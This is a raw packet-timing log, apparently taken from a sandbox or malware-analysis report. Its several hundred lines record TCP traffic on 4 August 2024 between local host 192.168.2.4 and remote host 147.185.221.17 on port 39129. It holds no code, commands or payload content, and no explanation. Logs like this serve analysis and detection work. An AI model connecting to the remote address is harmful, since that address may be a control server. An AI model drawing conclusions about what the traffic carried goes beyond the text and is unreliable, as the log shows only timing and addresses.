                                  Aug 4, 2024 12:53:53.335072994 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:03.866606951 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:03.871927023 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:04.162220001 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:04.163816929 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:04.169199944 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:15.101094961 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:15.106081963 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:15.116797924 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:15.122548103 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:15.132231951 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:15.137331009 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:15.718707085 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:15.720185041 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:15.720206022 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:15.720256090 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:15.720256090 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:15.735027075 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:15.740334034 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:15.743830919 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:15.749171019 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:15.850656986 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:15.860799074 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:15.865906000 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:18.929235935 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:18.934477091 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:19.217375040 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:19.218928099 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:19.223752975 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:20.523050070 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:20.528557062 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:20.601073027 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:20.606345892 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:20.616677046 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:20.621853113 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:20.811531067 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:20.812792063 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:20.817923069 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:20.944681883 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:20.949820995 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:21.009793043 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:21.010942936 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:21.016036987 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:21.196774960 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:21.198041916 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:21.202853918 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:21.397439957 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:21.415159941 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:21.420046091 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:23.266989946 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:23.396497965 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:34.835549116 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:34.840550900 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:35.124471903 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:35.126910925 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:35.131890059 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:40.945635080 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:40.950769901 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:41.246654034 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:41.248656034 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:41.253537893 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:41.913631916 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:41.918694019 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:42.215104103 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:42.221935034 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:42.226918936 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:46.242852926 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:46.248023033 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:46.548058033 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:46.549832106 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:46.554601908 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:46.554672956 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:46.559488058 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:46.616828918 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:46.621634007 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:46.757472038 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:46.762540102 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:47.055430889 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:47.057193041 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:47.061961889 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:47.283446074 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:47.285589933 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:47.290458918 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:47.290507078 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:47.295387030 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:53.278590918 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:53.413970947 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:57.007399082 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:57.012434959 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:57.306073904 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:54:57.314856052 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:54:57.319785118 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:02.976771116 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:02.981647968 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:03.101119041 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:03.107660055 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:03.147969961 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:03.152852058 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:03.179392099 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:03.184550047 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:03.263663054 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:03.265196085 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:03.270162106 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:03.463430882 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:03.465274096 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:03.471086025 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:03.569899082 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:03.575038910 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:03.666562080 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:03.673819065 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:03.679378986 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:03.976938963 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:03.985939980 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:03.990809917 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:04.048022032 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:04.050028086 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:04.054996967 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:06.432950974 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:06.442270994 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:06.724848986 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:06.727309942 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:06.732151031 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:08.726311922 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:08.731184006 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:08.741863012 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:08.750029087 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:08.757479906 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:08.762263060 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:08.773148060 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:08.777900934 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:08.788583040 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:08.793373108 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:08.804389000 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:08.809217930 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:08.819820881 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:08.830081940 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:09.022269964 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:09.024681091 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:09.034775019 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:09.222397089 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:09.223807096 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:09.228630066 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:09.366910934 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:09.371767998 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:09.406194925 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:09.407496929 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:09.460468054 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:09.460551023 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:09.465430975 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:09.632908106 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:09.638226986 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:09.846381903 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:09.852933884 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:09.858304977 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:10.050899982 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:10.052206993 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:10.057064056 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:11.759048939 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:11.763869047 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:12.050050974 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:12.054100037 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:12.058906078 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:19.132699966 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:19.137587070 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:19.179387093 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:19.184184074 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:19.414278030 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:19.418262005 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:19.423086882 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:19.445033073 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:19.449889898 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:19.602157116 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:19.607050896 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:19.611888885 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:19.822257042 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:19.823565006 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:19.831079960 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:21.618999004 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:21.623872042 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:21.911230087 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:21.915290117 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:21.920152903 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:23.266470909 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:23.302244902 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:23.307147980 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:23.594492912 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:23.596143007 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:23.601073980 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:27.304311037 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:27.309220076 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:27.588673115 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:27.590423107 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:27.595211029 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:29.445094109 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:29.449934006 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:29.736588001 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:29.740951061 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:29.746295929 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:34.835699081 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:34.840882063 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:34.960700989 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:34.965734959 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:35.054536104 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:35.059381008 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:35.124192953 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:35.126136065 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:35.132106066 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:35.311856985 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:35.313278913 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:35.318114042 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:35.528197050 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:35.529623032 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:35.535181999 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:37.728971004 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:37.934931040 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:38.213687897 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:38.217005968 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:38.221899033 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:42.932495117 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:42.937542915 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:43.224504948 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:43.228144884 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:43.233046055 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:43.320350885 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:43.327524900 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:43.752625942 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:43.755105972 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:43.760010004 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:45.085722923 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:45.092345953 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:45.195204020 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:45.200231075 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:45.210540056 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:45.215480089 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:45.365269899 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:45.367110014 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:45.371995926 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:45.557045937 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:45.558465004 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:45.563314915 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:45.741250992 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:45.748977900 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:45.753830910 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:50.304498911 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:50.309504986 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:50.591104984 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:50.599276066 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:50.604226112 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:53.271306038 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:53.319762945 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:56.460616112 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:56.465934992 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:56.743014097 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:56.744524002 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:56.749932051 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:58.070094109 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:58.075535059 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:58.355932951 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:55:58.358433962 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:55:58.363394022 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:05.664057970 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:05.668904066 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:05.947629929 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:05.954744101 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:05.959628105 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:09.007671118 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:09.012768984 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:09.287189960 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:09.289072037 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:09.293935061 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.070924997 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.076040983 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.101232052 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.106097937 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.179512024 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.185026884 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.195051908 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.199949980 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.210565090 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.215353966 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.226248980 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.231378078 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.273217916 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.278026104 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.289824009 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.294795036 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.320036888 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.324912071 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.335751057 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.340549946 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.351270914 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.356127024 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.358985901 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.360680103 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.408148050 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.445203066 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.450066090 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.559068918 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.560748100 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.565594912 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.746619940 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.751209021 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.756074905 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.763364077 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.768368959 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.932358980 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.939224005 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.944441080 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:11.944555998 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:11.949580908 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:13.491910934 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:13.496968031 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:13.784981012 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:13.787089109 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:13.792078018 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:14.291800976 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:14.296751022 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:14.581579924 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:14.587141991 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:14.592057943 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:21.710834980 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:21.716239929 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:21.729082108 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:21.733963966 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:22.007652998 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:22.009170055 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:22.014693975 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:22.359163046 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:22.363127947 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:22.370670080 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:23.283648014 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:23.346772909 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:27.320188046 CEST4973339129192.168.2.4147.185.221.17
